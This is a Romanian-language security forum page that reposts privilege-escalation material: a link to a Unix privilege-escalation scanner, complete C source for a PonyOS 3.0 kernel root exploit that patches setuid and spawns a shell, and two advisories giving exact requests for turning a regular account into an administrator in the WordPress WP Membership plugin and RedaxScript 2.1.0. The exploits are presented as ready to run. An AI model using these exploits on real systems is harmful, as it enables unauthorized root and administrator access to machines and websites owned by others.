Search the Community

Un simplu shell script care cauta configurari de rahat care ar putea permite privilege escalation de la un user la altul sau pentru acces la appuri locale. Merge pe Unix Systems. Download: https://github.com/pentestmonkey/unix-privesc-check/archive/master.zip Via: unix-privesc-check - Unix/Linux User Privilege Escalation Scanner - Darknet - The Darkside

# Exploit Title: PonyOS <= 3.0 tty ioctl() local kernel exploit # Google Dork: [if applicable] # Date: 29th June 2015 # Exploit Author: HackerFantastic # Vendor Homepage: www.ponyos.org # Software Link: [download link if available] # Version: [app version] PonyOS <= 3.0 # Tested on: PonyOS 3.0 # CVE : N/A # Source: https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/applejack.c /* PonyOS <= 3.0 tty ioctl() root exploit ======================================== PonyOS 0.4.99-mlp had two kernel vulnerabilities disclosed in April 2013 that could be leveraged to read/write arbitrary kernel memory. This is due to tty winsize ioctl() allowing to read/write arbitrary memory. This exploit patches the setuid system call to remove a root uid check allowing any process to obtain root privileges. John Cartwright found these flaws and others here: https://www.exploit-db.com/exploits/24933/ Written for educational purposes only. Enjoy! -- prdelka */ #include <stdio.h> #include <stdlib.h> #include <sys/ioctl.h> int main(){ struct winsize ws; printf("[+] PonyOS <= 3.0 ioctl() local root exploit\n"); memcpy(&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8); ioctl(0, TIOCSWINSZ, &ws); ioctl(0, TIOCGWINSZ, (void *)0x0010f101); printf("[-] patched sys_setuid()\n"); __asm("movl $0x18,%eax"); __asm("xorl %ebx,%ebx"); __asm("int $0x7F"); printf("[-] Got root?\n"); system("/bin/sh"); } Source @Byte-ul nu am timp sa fac demo si nici "resursele necesare" am sa inchid thread-ul pentru a evita offtopic-ul.

# Exploit Title: WordPress WP Membership plugin [Privilege escalation] # Contact: https://twitter.com/panVagenas # Vendor Homepage: http://wpmembership.e-plugins.com/ # Software Link: http://codecanyon.net/item/wp-membership/10066554 # Version: 1.2.3 # Tested on: WordPress 4.2.2 # CVE: CVE-2015-4038 1 Description Any registered user can perform a privilege escalation through `iv_membership_update_user_settings` AJAX action. Although this exploit can be used to modify other plugin related data (eg payment status and expiry date), privilege escalation can lead to a serious incident because the malicious user can take administrative role to the infected website. 2 Proof of Concept * Login as regular user * Sent a POST request to `http://example.com/wp-admin/admin-ajax.php` with data: `action=iv_membership_update_user_settings&form_data=user_id%3D<yourUserID>%26user_role%3Dadministrator` 3 Actions taken after discovery Vendor was informed on 2015/05/19. 4 Solution No official solution yet exists. Surs?: http://dl.packetstormsecurity.net/1505-exploits/wpmembership-escalate.txt

# Exploit Title: Privilege Escalation in RedaxScript 2.1.0 # Date: 11-05-2014 # Exploit Author: shyamkumar somana # Vendor Homepage: http://redaxscript.com/ # Version: 2.1.0 # Tested on: Windows 8 #Privilege Escalation in RedaxScript 2.1.0 RedaxScript 2.1.0 suffers from a privilege Escalation vulnerability. The issue occurs because the application fails to properly implement access controls. The application also fails to perform proper sanity checks on the user supplied input before processing it. These two flaws led to a vertical privilege escalation. This can be achieved by a simply tampering the parameter values. An attacker can exploit this issue to gain elevated privileges to the application. *Steps to reproduce the instance:* · login as a non admin user · Go to account and update the account. · intercept the request and add “*groups[]=1*” to the post data and submit the request · Log out of the application and log in again. You can now browse the application with admin privileges. This vulnerability was addressed in the following commit. https://github.com/redaxmedia/redaxscript/commit/bfe146f98aedb9d169ae092b49991ed1b3bc0860?diff=unified *Timeline*: 09-26-2014: Issue identified 09-27-2014: Discussion with the vendor 10-27-2014: Issue confirmed 11-05-2014: Patch released. Author: Shyamkumar Somana Vendor Homepage: http://redaxscript.com/download Version: 2.1.0 Tested on: Windows 7 -- [image: --] shyam kumar [image: http://]about.me/shyamkumar.somana <http://about.me/shyamkumar.somana?promo=email_sig> Shyamkumar Somana | +91 89513 38625 | twitter.com/0xshyam | in.linkedin.com/in/sshyamkumar/ | Source